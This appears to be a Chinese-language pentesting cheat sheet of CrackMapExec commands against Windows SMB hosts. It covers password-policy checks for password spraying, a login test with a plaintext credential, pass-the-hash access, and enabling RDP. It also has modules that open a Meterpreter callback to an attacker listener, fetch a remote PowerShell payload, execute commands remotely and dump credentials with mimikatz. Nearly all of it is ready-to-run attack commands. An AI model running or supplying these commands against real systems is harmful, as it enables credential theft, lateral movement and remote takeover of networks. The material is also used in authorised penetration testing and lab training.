### 查密码策略 ```bash cme smb ip --pass-pol ##查看 account lockout threshold -> 账号锁定的值 如果为0则可以进行密码喷射 ``` ### test ``` crackmapexec smb 10.10.93.195 -u bitbucket -p littleredbucket --continue-on-success ``` ### ```bash cme smb -L cme smb -M name_module -o VAR=DATA cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz cme mimikatz --server http --server-port 80 ``` ### 集成bloodhound ```~/.cme/cme.conf [BloodHound] bh_enabled = True bh_uri = 127.0.0.1 bh_port = 7687 bh_user = user bh_pass = pass ```